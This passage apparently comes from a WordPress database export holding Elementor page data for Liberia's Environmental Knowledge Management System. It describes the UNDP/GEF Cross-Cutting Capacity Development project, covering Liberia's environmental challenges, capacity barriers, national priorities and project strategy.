remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\nThis project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<p style=\\\"background-color:lightgray;\\\">\\nThe uniqueness of this project is centered on its cross-cutting nature.  Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach.  In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization.  Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12319,2003,'_elementor_edit_mode','builder'),(12320,2003,'_elementor_template_type','wp-page'),(12321,2003,'_elementor_version','2.7.5'),(12322,2003,'_wp_page_template','default'),(12323,2003,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to 